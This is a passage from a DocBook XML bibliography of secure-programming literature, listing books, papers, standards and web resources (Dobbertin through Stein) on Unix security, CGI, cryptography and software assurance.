<ulink url="http://www.systemexperts.com/win2k/hardenW2K11.pdf">http://www.systemexperts.com/win2k/hardenW2K11.pdf</ulink>.
|
||
<!-- http://www.systemexperts.com/win2k.shtml -->
|
||
</para>
|
||
|
||
<para>
|
||
[Dobbertin 1996].
|
||
Dobbertin, H.
|
||
1996.
|
||
The Status of MD5 After a Recent Attack.
|
||
RSA Laboratories' CryptoBytes.
|
||
Vol. 2, No. 2.
|
||
</para>
|
||
|
||
<para>
|
||
[Felten 1997]
|
||
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
|
||
Web Spoofing: An Internet Con Game
|
||
Technical Report 540-96 (revised Feb. 1997)
|
||
Department of Computer Science, Princeton University
|
||
<ulink url="http://www.cs.princeton.edu/sip/pub/spoofing.pdf">
|
||
http://www.cs.princeton.edu/sip/pub/spoofing.pdf
|
||
</ulink>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Fenzi 1999]
|
||
Fenzi, Kevin, and Dave Wrenski.
|
||
April 25, 1999.
|
||
<emphasis remap="it">Linux Security HOWTO</emphasis>.
|
||
Version 1.0.2.
|
||
<ulink
|
||
url="http://www.tldp.org/HOWTO/Security-HOWTO.html">http://www.tldp.org/HOWTO/Security-HOWTO.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FHS 1997]
|
||
Filesystem Hierarchy Standard (FHS 2.0).
|
||
October 26, 1997.
|
||
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan.
|
||
Version 2.0.
|
||
<ulink
|
||
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Filipski 1986]
|
||
Filipski, Alan and James Hanko.
|
||
April 1986.
|
||
``Making Unix Secure.''
|
||
Byte (Magazine).
|
||
Peterborough, NH: McGraw-Hill Inc.
|
||
Vol. 11, No. 4.
|
||
ISSN 0360-5280.
|
||
pp. 113-128.
|
||
</para>
|
||
|
||
<para>
|
||
[Flake 2001]
|
||
Flake, Havlar.
|
||
Auditing Binaries for Security Vulnerabilities.
|
||
<ulink url="http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html">http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[FOLDOC]
|
||
Free On-Line Dictionary of Computing.
|
||
<ulink
|
||
url="http://foldoc.doc.ic.ac.uk/foldoc/index.html">
|
||
http://foldoc.doc.ic.ac.uk/foldoc/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Forristal 2001]
|
||
Forristal, Jeff, and Greg Shipley.
|
||
January 8, 2001.
|
||
Vulnerability Assessment Scanners.
|
||
Network Computing.
|
||
<ulink url="http://www.nwc.com/1201/1201f1b1.html">http://www.nwc.com/1201/1201f1b1.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FreeBSD 1999]
|
||
FreeBSD, Inc.
|
||
1999.
|
||
``Secure Programming Guidelines''.
|
||
<emphasis remap="it">FreeBSD Security Information</emphasis>.
|
||
<ulink
|
||
url="http://www.freebsd.org/security/security.html">http://www.freebsd.org/security/security.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Friedl 1997]
|
||
Friedl, Jeffrey E. F.
|
||
1997.
|
||
Mastering Regular Expressions.
|
||
O'Reilly.
|
||
ISBN 1-56592-257-3.
|
||
</para>
|
||
|
||
<para>
|
||
[FSF 1998]
|
||
Free Software Foundation.
|
||
December 17, 1999.
|
||
<emphasis remap="it">Overview of the GNU Project</emphasis>.
|
||
<ulink
|
||
url="http://www.gnu.ai.mit.edu/gnu/gnu-history.html">http://www.gnu.ai.mit.edu/gnu/gnu-history.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FSF 1999]
|
||
Free Software Foundation.
|
||
January 11, 1999.
|
||
<emphasis remap="it">The GNU C Library Reference Manual</emphasis>.
|
||
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library.
|
||
Available at, for example,
|
||
<ulink url="http://www.netppl.fi/~pp/glibc21/libc_toc.html">http://www.netppl.fi/~pp/glibc21/libc_toc.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Fu 2001]
|
||
Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster.
|
||
August 2001.
|
||
``Dos and Don'ts of Client Authentication on the Web''.
|
||
Proceedings of the 10th USENIX Security Symposium,
|
||
Washington, D.C., August 2001.
|
||
<ulink url="http://cookies.lcs.mit.edu/pubs/webauth.html">
|
||
http://cookies.lcs.mit.edu/pubs/webauth.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Gabrilovich 2002]
|
||
Gabrilovich, Evgeniy, and Alex Gontmakher.
|
||
February 2002.
|
||
``Inside Risks: The Homograph Attack''.
|
||
Communications of the ACM.
|
||
Volume 45, Number 2.
|
||
Page 128.
|
||
|
||
</para>
|
||
|
||
<para>
|
||
[Galvin 1998a]
|
||
Galvin, Peter.
|
||
April 1998.
|
||
``Designing Secure Software''.
|
||
<emphasis remap="it">Sunworld</emphasis>.
|
||
<ulink
|
||
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">http://www.sunworld.com/swol-04-1998/swol-04-security.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Galvin 1998b]
|
||
Galvin, Peter.
|
||
August 1998.
|
||
``The Unix Secure Programming FAQ''.
|
||
<emphasis remap="it">Sunworld</emphasis>.
|
||
<ulink
|
||
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Garfinkel 1996]
|
||
Garfinkel, Simson and Gene Spafford.
|
||
April 1996.
|
||
<emphasis remap="it">Practical UNIX & Internet Security, 2nd Edition</emphasis>.
|
||
ISBN 1-56592-148-8.
|
||
Sebastopol, CA: O'Reilly & Associates, Inc.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/puis">http://www.oreilly.com/catalog/puis</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Garfinkle 1997]
|
||
Garfinkle, Simson.
|
||
August 8, 1997.
|
||
21 Rules for Writing Secure CGI Programs.
|
||
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
|
||
http://webreview.com/wr/pub/97/08/08/bookshelf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Gay 2000]
|
||
Gay, Warren W.
|
||
October 2000.
|
||
Advanced Unix Programming.
|
||
Indianapolis, Indiana: Sams Publishing.
|
||
ISBN 0-67231-990-X.
|
||
</para>
|
||
|
||
<para>
|
||
[Geodsoft 2001]
|
||
Geodsoft.
|
||
February 7, 2001.
|
||
Hardening OpenBSD Internet Servers.
|
||
<ulink url="http://www.geodsoft.com/howto/harden">http://www.geodsoft.com/howto/harden</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Graham 1999]
|
||
Graham, Jeff.
|
||
May 4, 1999.
|
||
<emphasis remap="it">Security-Audit's Frequently Asked Questions (FAQ)</emphasis>.
|
||
<ulink
|
||
url="http://lsap.org/faq.txt">http://lsap.org/faq.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Gong 1999]
|
||
Gong, Li.
|
||
June 1999.
|
||
<emphasis remap="it">Inside Java 2 Platform Security</emphasis>.
|
||
Reading, MA: Addison Wesley Longman, Inc.
|
||
ISBN 0-201-31000-7.
|
||
</para>
|
||
|
||
<para>
|
||
[Gundavaram Unknown]
|
||
Gundavaram, Shishir, and Tom Christiansen.
|
||
Date Unknown.
|
||
<emphasis remap="it">Perl CGI Programming FAQ</emphasis>.
|
||
<ulink
|
||
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Hall 1999]
|
||
Hall, Brian "Beej".
|
||
Beej's Guide to Network Programming Using Internet Sockets.
|
||
13-Jan-1999.
|
||
Version 1.5.5.
|
||
<ulink url="http://www.ecst.csuchico.edu/~beej/guide/net">http://www.ecst.csuchico.edu/~beej/guide/net</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Howard 2002]
|
||
Howard, Michael and David LeBlanc.
|
||
2002.
|
||
Writing Secure Code.
|
||
Redmond, Washington: Microsoft Press.
|
||
ISBN 0-7356-1588-8.
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 12207]
|
||
International Organization for Standardization (ISO).
|
||
1995.
|
||
Information technology -- Software life cycle processes
|
||
ISO/IEC 12207:1995.
|
||
<!-- http://www.iso.ch/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=21208&ICS1=35&ICS2=80&ICS3= -->
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 13335]
|
||
International Organization for Standardization (ISO).
|
||
ISO/IEC TR 13335.
|
||
Guidelines for the Management of IT Security (GMITS).
|
||
<!-- This is a technical report, not a standard -->
|
||
Note that this is a five-part technical report (not a standard); see also
|
||
ISO/IEC 17799:2000.
|
||
It includes:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
ISO 13335-1: Concepts and Models for IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-2: Managing and Planning IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-3: Techniques for the Management of IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-4: Selection of Safeguards
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-5: Safeguards for External Connections
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 17799]
|
||
International Organization for Standardization (ISO).
|
||
December 2000.
|
||
Code of Practice for Information Security Management.
|
||
ISO/IEC 17799:2000.
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 9000]
|
||
International Organization for Standardization (ISO).
|
||
2000.
|
||
Quality management systems - Fundamentals and vocabulary.
|
||
ISO 9000:2000.
|
||
See
|
||
<ulink url="http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html">
|
||
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 9001]
|
||
International Organization for Standardization (ISO).
|
||
2000.
|
||
Quality management systems - Requirements
|
||
ISO 9001:2000
|
||
</para>
|
||
|
||
<para>
|
||
[Jones 2000]
|
||
Jones, Jennifer.
|
||
October 30, 2000.
|
||
``Banking on Privacy''.
|
||
InfoWorld, Volume 22, Issue 44.
|
||
San Mateo, CA: International Data Group (IDG).
|
||
pp. 1-12.
|
||
</para>
|
||
|
||
<para>
|
||
[Kelsey 1998]
|
||
Kelsey, J., B. Schneier, D. Wagner, and C. Hall.
|
||
March 1998.
|
||
"Cryptanalytic Attacks on Pseudorandom Number Generators."
|
||
Fast Software Encryption, Fifth International Workshop Proceedings
|
||
(March 1998), Springer-Verlag, 1998, pp. 168-188.
|
||
<ulink url="http://www.counterpane.com/pseudorandom_number.html">
|
||
http://www.counterpane.com/pseudorandom_number.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Kernighan 1988]
|
||
Kernighan, Brian W., and Dennis M. Ritchie.
|
||
1988.
|
||
<emphasis remap="it">The C Programming Language</emphasis>.
|
||
Second Edition.
|
||
Englewood Cliffs, NJ: Prentice-Hall.
|
||
ISBN 0-13-110362-8.
|
||
</para>
|
||
|
||
<para>
|
||
[Kim 1996]
|
||
Kim, Eugene Eric.
|
||
1996.
|
||
<emphasis remap="it">CGI Developer's Guide</emphasis>.
|
||
SAMS.net Publishing.
|
||
ISBN: 1-57521-087-8
|
||
<ulink
|
||
url="http://www.eekim.com/pubs/cgibook">http://www.eekim.com/pubs/cgibook</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
Kolsek [2002]
|
||
Kolsek, Mitja. December 2002.
|
||
Session Fixation Vulnerability in Web-based Applications
|
||
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
|
||
http://www.acros.si/papers/session_fixation.pdf</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Kuchling 2000].
|
||
Kuchling, A.M.
|
||
2000.
|
||
Restricted Execution HOWTO.
|
||
<ulink url="http://www.python.org/doc/howto/rexec/rexec.html">http://www.python.org/doc/howto/rexec/rexec.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Kuhn 2002]
|
||
Kuhn, Markus G.
|
||
Optical Time-Domain Eavesdropping Risks
|
||
of CRT displays.
|
||
Proceedings of the 2002 IEEE Symposium on Security and Privacy,
|
||
Oakland, CA, May 12-15, 2002.
|
||
<ulink url="http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf">
|
||
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[LSD 2001]
|
||
The Last Stage of Delirium.
|
||
July 4, 2001.
|
||
<emphasis remap="it">UNIX Assembly Codes Development
|
||
for Vulnerabilities Illustration Purposes.</emphasis>
|
||
<ulink url="http://lsd-pl.net/papers.html#assembly">http://lsd-pl.net/papers.html#assembly</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McClure 1999]
|
||
McClure, Stuart, Joel Scambray, and George Kurtz.
|
||
1999.
|
||
<emphasis remap="it">Hacking Exposed: Network Security Secrets and Solutions</emphasis>.
|
||
Berkeley, CA: Osbourne/McGraw-Hill.
|
||
ISBN 0-07-212127-0.
|
||
</para>
|
||
|
||
<para>
|
||
[McKusick 1999]
|
||
McKusick, Marshall Kirk.
|
||
January 1999.
|
||
``Twenty Years of Berkeley Unix: From AT&T-Owned to
|
||
Freely Redistributable.''
|
||
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/opensources/book/kirkmck.html">http://www.oreilly.com/catalog/opensources/book/kirkmck.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 1999]
|
||
McGraw, Gary, and Edward W. Felten.
|
||
December 1998.
|
||
Twelve Rules for developing more secure Java code.
|
||
Javaworld.
|
||
<ulink url="http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html">http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 1999]
|
||
McGraw, Gary, and Edward W. Felten.
|
||
January 25, 1999.
|
||
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition
|
||
John Wiley & Sons.
|
||
ISBN 047131952X.
|
||
<ulink url="http://www.securingjava.com">http://www.securingjava.com</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 2000a]
|
||
McGraw, Gary and John Viega.
|
||
March 1, 2000.
|
||
Make Your Software Behave: Learning the Basics of Buffer Overflows.
|
||
<ulink
|
||
url="http://www-4.ibm.com/software/developer/library/overflows/index.html">http://www-4.ibm.com/software/developer/library/overflows/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 2000b]
|
||
McGraw, Gary and John Viega.
|
||
April 18, 2000.
|
||
Make Your Software Behave: Software strategies
|
||
In the absence of hardware,
|
||
you can devise a reasonably secure random number generator through software.
|
||
<ulink url="http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security">http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Miller 1995]
|
||
Miller, Barton P.,
|
||
David Koski, Cjin Pheow Lee, Vivekananda Maganty,
|
||
Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
|
||
1995.
|
||
Fuzz Revisited: A Re-examination of the Reliability of
|
||
UNIX Utilities and Services.
|
||
<ulink url="ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf">ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Miller 1999]
|
||
Miller, Todd C. and Theo de Raadt.
|
||
``strlcpy and strlcat -- Consistent, Safe, String Copy and Concatenation''
|
||
<emphasis remap="it">Proceedings of Usenix '99</emphasis>.
|
||
<ulink
|
||
url="http://www.usenix.org/events/usenix99/millert.html">http://www.usenix.org/events/usenix99/millert.html</ulink> and
|
||
<ulink
|
||
url="http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST">http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Mookhey 2002]
|
||
Mookhey, K. K.
|
||
The Unix Auditor's Practical Handbook.
|
||
<ulink url="http://www.nii.co.in/tuaph.html">http://www.nii.co.in/tuaph.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Mudge 1995]
|
||
Mudge.
|
||
October 20, 1995.
|
||
<emphasis remap="it">How to write Buffer Overflows</emphasis>.
|
||
l0pht advisories.
|
||
<ulink
|
||
url="http://www.l0pht.com/advisories/bufero.html">http://www.l0pht.com/advisories/bufero.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Murhammer 1998]
|
||
Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
|
||
Larry R. Pugh, Kazunari Suzuki, and David H. Wood.
|
||
October 1998.
|
||
TCP/IP Tutorial and Technical Overview
|
||
IBM International Technical Support Organization.
|
||
<ulink url="http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf">http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[NCSA]
|
||
NCSA Secure Programming Guidelines.
|
||
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Neumann 2000]
|
||
Neumann, Peter.
|
||
2000.
|
||
"Robust Nonproprietary Software."
|
||
Proceedings of the 2000 IEEE Symposium on Security and Privacy
|
||
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
|
||
Los Alamitos, CA: IEEE Computer Society.
|
||
pp.122-123.
|
||
</para>
|
||
|
||
<para>
|
||
[NSA 2000]
|
||
National Security Agency (NSA).
|
||
<!-- Conceivably the author should be listed as the
|
||
Information Assurance Technical Framework Forum (IATFF), but that's
|
||
not what the document cover says. -->
|
||
September 2000.
|
||
Information Assurance Technical Framework (IATF).
|
||
<ulink url="http://www.iatf.net">http://www.iatf.net</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Open Group 1997]
|
||
The Open Group.
|
||
1997.
|
||
<emphasis remap="it">Single UNIX Specification, Version 2 (UNIX 98)</emphasis>.
|
||
<ulink
|
||
url="http://www.opengroup.org/online-pubs?DOC=007908799">http://www.opengroup.org/online-pubs?DOC=007908799</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[OSI 1999]
|
||
Open Source Initiative.
|
||
1999.
|
||
<emphasis remap="it">The Open Source Definition</emphasis>.
|
||
<ulink
|
||
url="http://www.opensource.org/osd.html">http://www.opensource.org/osd.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Opplinger 1998]
|
||
Oppliger, Rolf.
|
||
1998.
|
||
Internet and Intranet Security.
|
||
Norwood, MA: Artech House.
|
||
ISBN 0-89006-829-1.
|
||
</para>
|
||
|
||
<para>
|
||
[Paulk 1993a]
|
||
Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber.
|
||
Capability Maturity Model for Software, Version 1.1.
|
||
Software Engineering Institute, CMU/SEI-93-TR-24.
|
||
DTIC Number ADA263403, February 1993.
|
||
<ulink url="http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html">http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Paulk 1993b]
|
||
Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn W. Bush.
|
||
Key Practices of the Capability Maturity Model, Version 1.1.
|
||
Software Engineering Institute.
|
||
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
|
||
</para>
|
||
|
||
<para>
|
||
[Peteanu 2000]
|
||
Peteanu, Razvan.
|
||
July 18, 2000.
|
||
Best Practices for Secure Web Development.
|
||
<ulink url="http://members.home.net/razvan.peteanu">http://members.home.net/razvan.peteanu</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Pfleeger 1997]
|
||
Pfleeger, Charles P.
|
||
1997.
|
||
<emphasis remap="it">Security in Computing.</emphasis>
|
||
Upper Saddle River, NJ: Prentice-Hall PTR.
|
||
ISBN 0-13-337486-6.
|
||
</para>
|
||
|
||
<para>
|
||
[Phillips 1995]
|
||
Phillips, Paul.
|
||
September 3, 1995.
|
||
<emphasis remap="it">Safe CGI Programming</emphasis>.
|
||
<ulink
|
||
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Quintero 1999]
|
||
Quintero, Federico Mena,
|
||
Miguel de Icaza, and Morten Welinder
|
||
GNOME Programming Guidelines
|
||
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">http://developer.gnome.org/doc/guides/programming-guidelines/book1.html</ulink>
|
||
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
[Raymond 1997]
|
||
Raymond, Eric.
|
||
1997.
|
||
<emphasis remap="it">The Cathedral and the Bazaar</emphasis>.
|
||
<ulink
|
||
url="http://www.catb.org/~esr/writings/cathedral-bazaar">http://www.catb.org/~esr/writings/cathedral-bazaar</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Raymond 1998]
|
||
Raymond, Eric.
|
||
April 1998.
|
||
<emphasis remap="it">Homesteading the Noosphere</emphasis>.
|
||
<ulink
|
||
url="http://www.catb.org/~esr/writings/homesteading/homesteading.html">http://www.catb.org/~esr/writings/homesteading/homesteading.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Ranum 1998]
|
||
Ranum, Marcus J.
|
||
1998.
|
||
<emphasis remap="it">Security-critical coding for programmers -
|
||
a C and UNIX-centric full-day tutorial</emphasis>.
|
||
<ulink
|
||
url="http://www.clark.net/pub/mjr/pubs/pdf/">http://www.clark.net/pub/mjr/pubs/pdf/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[RFC 822]
|
||
August 13, 1982
|
||
<emphasis remap="it">Standard for the Format of ARPA Internet Text Messages</emphasis>.
|
||
IETF RFC 822.
|
||
<ulink
|
||
url="http://www.ietf.org/rfc/rfc0822.txt">http://www.ietf.org/rfc/rfc0822.txt</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[rfp 1999]
|
||
rain.forest.puppy.
|
||
1999.
|
||
``Perl CGI problems''.
|
||
<emphasis remap="it">Phrack Magazine</emphasis>.
|
||
Issue 55, Article 07.
|
||
<ulink
|
||
url="http://www.phrack.com/search.phtml?view&article=p55-7">http://www.phrack.com/search.phtml?view&article=p55-7</ulink> or
|
||
<ulink url="http://www.insecure.org/news/P55-07.txt">http://www.insecure.org/news/P55-07.txt</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Rijmen 2000]
|
||
Rijmen, Vincent.
|
||
"LinuxSecurity.com Speaks With AES Winner".
|
||
<ulink url="http://www.linuxsecurity.com/feature_stories/interview-aes-3.html">http://www.linuxsecurity.com/feature_stories/interview-aes-3.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Rochkind 1985].
|
||
Rochkind, Marc J.
|
||
<emphasis>Advanced Unix Programming</emphasis>.
|
||
Englewood Cliffs, NJ: Prentice-Hall, Inc.
|
||
ISBN 0-13-011818-4.
|
||
</para>
|
||
|
||
<para>
|
||
[Sahu 2002]
|
||
Sahu, Bijaya Nanda,
|
||
Srinivasan S. Muthuswamy,
|
||
Satya Nanaji Rao Mallampalli, and
|
||
Venkata R. Bonam.
|
||
July 2002
|
||
``Is your Java code secure -- or exposed?
|
||
Build safer applications now to avoid trouble later''
|
||
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
|
||
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
|
||
</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[St. Laurent 2000]
|
||
St. Laurent, Simon.
|
||
February 2000.
|
||
<emphasis remap="it">XTech 2000 Conference Reports</emphasis>.
|
||
``When XML Gets Ugly''.
|
||
<ulink
|
||
url="http://www.xml.com/pub/2000/02/xtech/megginson.html">http://www.xml.com/pub/2000/02/xtech/megginson.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Saltzer 1974]
|
||
Saltzer, J.
|
||
July 1974.
|
||
``Protection and the Control of Information Sharing in MULTICS''.
|
||
<emphasis remap="it">Communications of the ACM</emphasis>.
|
||
v17 n7.
|
||
pp. 388-402.
|
||
</para>
|
||
|
||
<para>
|
||
[Saltzer 1975]
|
||
Saltzer, J., and M. Schroeder.
|
||
September 1975.
|
||
``The Protection of Information in Computing Systems''.
|
||
<emphasis remap="it">Proceedings of the IEEE</emphasis>.
|
||
v63 n9.
|
||
pp. 1278-1308.
|
||
<ulink
|
||
url="http://www.mediacity.com/~norm/CapTheory/ProtInf">http://www.mediacity.com/~norm/CapTheory/ProtInf</ulink>.
|
||
Summarized in [Pfleeger 1997, 286].
|
||
</para>
|
||
|
||
<para>
|
||
[Schneider 2000]
|
||
Schneider, Fred B.
|
||
2000.
|
||
"Open Source in Security: Visting the Bizarre."
|
||
Proceedings of the 2000 IEEE Symposium on Security and Privacy
|
||
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
|
||
Los Alamitos, CA: IEEE Computer Society.
|
||
pp.126-127.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1996]
|
||
Schneier, Bruce.
|
||
1996.
|
||
<emphasis remap="it">Applied Cryptography, Second Edition:
|
||
Protocols, Algorithms, and Source Code in C</emphasis>.
|
||
New York: John Wiley and Sons.
|
||
ISBN 0-471-12845-7.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1998]
|
||
Schneier, Bruce and Mudge.
|
||
November 1998.
|
||
<emphasis remap="it">Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP)</emphasis>
|
||
Proceedings of the 5th ACM Conference on Communications and Computer Security,
|
||
ACM Press.
|
||
<ulink
|
||
url="http://www.counterpane.com/pptp.html">http://www.counterpane.com/pptp.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1999]
|
||
Schneier, Bruce.
|
||
September 15, 1999.
|
||
``Open Source and Security''.
|
||
<emphasis remap="it">Crypto-Gram</emphasis>.
|
||
Counterpane Internet Security, Inc.
|
||
<ulink
|
||
url="http://www.counterpane.com/crypto-gram-9909.html">http://www.counterpane.com/crypto-gram-9909.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Seifried 1999]
|
||
Seifried, Kurt.
|
||
October 9, 1999.
|
||
<emphasis remap="it">Linux Administrator's Security Guide</emphasis>.
|
||
<ulink
|
||
url="http://www.securityportal.com/lasg">http://www.securityportal.com/lasg</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Seifried 2001]
|
||
Seifried, Kurt.
|
||
September 2, 2001.
|
||
WWW Authentication
|
||
<ulink url="http://www.seifried.org/security/www-auth/index.html">
|
||
http://www.seifried.org/security/www-auth/index.html</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Shankland 2000]
|
||
Shankland, Stephen.
|
||
``Linux poses increasing threat to Windows 2000''.
|
||
CNET.
|
||
<ulink
|
||
url="http://news.cnet.com/news/0-1003-200-1549312.html">http://news.cnet.com/news/0-1003-200-1549312.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Shostack 1999]
|
||
Shostack, Adam.
|
||
June 1, 1999.
|
||
<emphasis remap="it">Security Code Review Guidelines</emphasis>.
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/review.html">http://www.homeport.org/~adam/review.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Sibert 1996]
|
||
Sibert, W. Olin.
|
||
Malicious Data and Computer Security.
|
||
(NIST) NISSC '96.
|
||
<ulink url="http://www.fish.com/security/maldata.html">http://www.fish.com/security/maldata.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Sitaker 1999]
|
||
Sitaker, Kragen.
|
||
Feb 26, 1999.
|
||
<emphasis remap="it">How to Find Security Holes</emphasis>
|
||
<ulink
|
||
url="http://www.pobox.com/~kragen/security-holes.html">http://www.pobox.com/~kragen/security-holes.html</ulink> and
|
||
<ulink
|
||
url="http://www.dnaco.net/~kragen/security-holes.html">http://www.dnaco.net/~kragen/security-holes.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[SSE-CMM 1999]
|
||
SSE-CMM Project.
|
||
April 1999.
|
||
<emphasis remap="it">Systems Security Engineering Capability Maturity Model (SSE CMM)
|
||
Model Description Document</emphasis>.
|
||
Version 2.0.
|
||
<ulink
|
||
url="http://www.sse-cmm.org">http://www.sse-cmm.org</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Stallings 1996]
|
||
Stallings, William.
|
||
Practical Cryptography for Data Internetworks.
|
||
Los Alamitos, CA: IEEE Computer Society Press.
|
||
ISBN 0-8186-7140-8.
|
||
</para>
|
||
|
||
<para>
|
||
[Stein 1999].
|
||
Stein, Lincoln D.
|
||
September 13, 1999.
|
